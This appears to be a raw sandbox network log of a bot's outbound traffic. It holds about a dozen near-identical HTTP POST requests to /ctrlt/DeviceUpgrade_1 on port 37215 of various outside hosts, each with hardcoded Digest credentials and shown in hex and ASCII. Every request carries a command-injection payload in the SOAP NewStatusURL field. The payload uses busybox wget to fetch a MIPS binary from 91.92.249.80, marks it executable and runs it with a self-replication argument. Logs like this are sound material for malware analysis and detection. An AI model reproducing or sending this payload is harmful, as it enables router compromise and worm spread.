                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2053192.168.2.2346272197.80.149.6837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.598656893 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2054192.168.2.2344192157.198.97.1937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.598754883 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2055192.168.2.2335766157.104.71.14437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.598762035 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2056192.168.2.2341090148.203.17.12437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.598768950 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2057192.168.2.2333888157.107.200.18537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.598779917 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2058192.168.2.2336252157.201.184.18637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.598876953 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2059192.168.2.235905641.50.232.537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.598881006 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2060192.168.2.2344690161.36.18.14237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.598905087 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2061192.168.2.234067462.80.193.10437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.598906994 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2062192.168.2.2354136197.174.88.20537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.598925114 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2063192.168.2.2343630157.75.148.10437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.598927975 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
